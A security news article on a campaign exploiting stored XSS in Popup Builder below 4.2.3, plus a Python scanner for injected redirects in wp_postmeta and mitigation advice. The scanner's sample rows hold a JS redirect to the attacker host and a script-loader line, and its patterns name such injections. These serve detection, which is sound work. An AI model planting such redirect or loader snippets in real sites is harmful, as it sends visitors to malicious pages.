New Malware Campaign Exploits Stored XSS in Popup Builder < 4.2.3

A recent surge in cyberattacks has been linked to a new malware campaign targeting websites utilizing the Popup Builder WordPress plugin. Initially identified by security expert Marc Montpas in November 2023, the vulnerability is now being exploited at an alarming rate. In just three weeks, over 3,300 websites have fallen victim to this malicious campaign, with the number continuing to rise rapidly. SiteCheck, a remote malware scanner, has flagged over 1,170 sites as infected.

The Modus Operandi

The attackers exploit the known stored XSS vulnerability in Popup Builder (versions below 4.2.3) to inject malicious code. The code is typically concealed in the plugin's Custom JS or Custom CSS sections of the WordPress admin interface and is stored in the wp_postmeta database table.

These injections act as handlers for various Popup Builder events, allowing the attackers to execute malicious actions during different stages of the popup display process.

Detection and Impact

The malware campaign operates from recently registered domains, dating back to February 12th, 2024. Malicious code injections have been detected, with variations including redirects to suspicious URLs, such as “hxxp://ttincoming.traveltraffic[.]cc/?traffic”.

SiteCheck identifies the malware as “?pbuilder_injection.1.x”. However, the full extent of its capabilities and potential damage remains a concern.
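A defender-side check for the injection pattern described above (custom JS stored in wp_postmeta that redirects visitors), as an added example that is not from the original report or from the Popup Builder project: it walks a constructed in-memory copy of wp_postmeta and flags rows that reference the report's redirect host or match generic redirect/loader heuristics. The meta_key names in the sample rows are hypothetical, so the scan deliberately inspects every row rather than assuming the plugin's key names.

```python
import re
import sqlite3

# Host taken from the redirect URL in the report (defanged there as traveltraffic[.]cc).
KNOWN_BAD_HOSTS = ("ttincoming.traveltraffic.cc",)

# Generic heuristics for JS/CSS that should never need these constructs in a popup.
SUSPICIOUS_PATTERNS = [
    (re.compile(r"<script\b", re.I), "inline <script> tag"),
    (re.compile(r"(window|document)\.location(\.href)?\s*=", re.I), "JS redirect"),
    (re.compile(r"https?://[^\s\"']+/\?traffic", re.I), "?traffic redirect URL"),
    (re.compile(r"\batob\s*\(|\beval\s*\(", re.I), "decode/eval of hidden payload"),
    (re.compile(r"createElement\s*\(\s*['\"]script", re.I), "dynamic script loader"),
]


def classify(meta_value):
    """Return the list of reasons a single meta_value looks like an injection."""
    reasons = []
    lowered = meta_value.lower()
    for host in KNOWN_BAD_HOSTS:
        if host in lowered:
            reasons.append(f"known malicious host {host}")
    for pattern, label in SUSPICIOUS_PATTERNS:
        if pattern.search(meta_value):
            reasons.append(label)
    return reasons


def scan_postmeta(conn):
    """Inspect every wp_postmeta row; return (meta_id, post_id, meta_key, reasons) hits."""
    hits = []
    rows = conn.execute("SELECT meta_id, post_id, meta_key, meta_value FROM wp_postmeta")
    for meta_id, post_id, meta_key, meta_value in rows:
        reasons = classify(meta_value or "")
        if reasons:
            hits.append((meta_id, post_id, meta_key, reasons))
    return hits


def build_sample_db():
    """Constructed in-memory stand-in for wp_postmeta; the meta_key names are hypothetical."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE wp_postmeta (meta_id INTEGER, post_id INTEGER, meta_key TEXT, meta_value TEXT)")
    conn.executemany("INSERT INTO wp_postmeta VALUES (?, ?, ?, ?)", [
        (1, 10, "popup_custom_css", ".sgpb-popup { color: #333; }"),  # benign CSS
        (2, 10, "popup_custom_js", "window.location.href='http://ttincoming.traveltraffic.cc/?traffic';"),
        (3, 11, "popup_custom_js", "console.log('popup opened');"),  # benign JS
        (4, 12, "popup_custom_js", "var s=document.createElement('script');s.src=atob('BASE64_PLACEHOLDER');"),
    ])
    return conn


if __name__ == "__main__":
    for hit in scan_postmeta(build_sample_db()):
        print(hit)
```

Against a live site the same `scan_postmeta` can be pointed at a read-only export of the real table; hits are candidates for manual review, not automatic deletion.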

Mitigation and Prevention

Website owners are urged to take immediate action to mitigate the risk posed by this campaign. Updating the Popup Builder plugin to version 4.2.3 or later is the essential step in preventing further infections. Additionally, thorough website scans at both the client and server levels are recommended to detect and remove any hidden backdoors.

In the event of a compromise, prompt removal of the malicious injection is essential. However, this should be followed by comprehensive cleanup efforts to prevent reinfection.

The Wake-Up Call

This latest malware campaign serves as a stark reminder of the importance of keeping website software up to date. Failure to do so not only exposes websites to vulnerabilities but also poses a significant risk to user data and online security.

Website owners are encouraged to prioritize regular software updates and implement robust security measures to safeguard against emerging threats.

Seeking Assistance

For those grappling with potential infections or seeking guidance on securing their websites, expert assistance is readily available. Experienced analysts are on standby 24/7 to provide support in removing malware and fortifying online defenses.
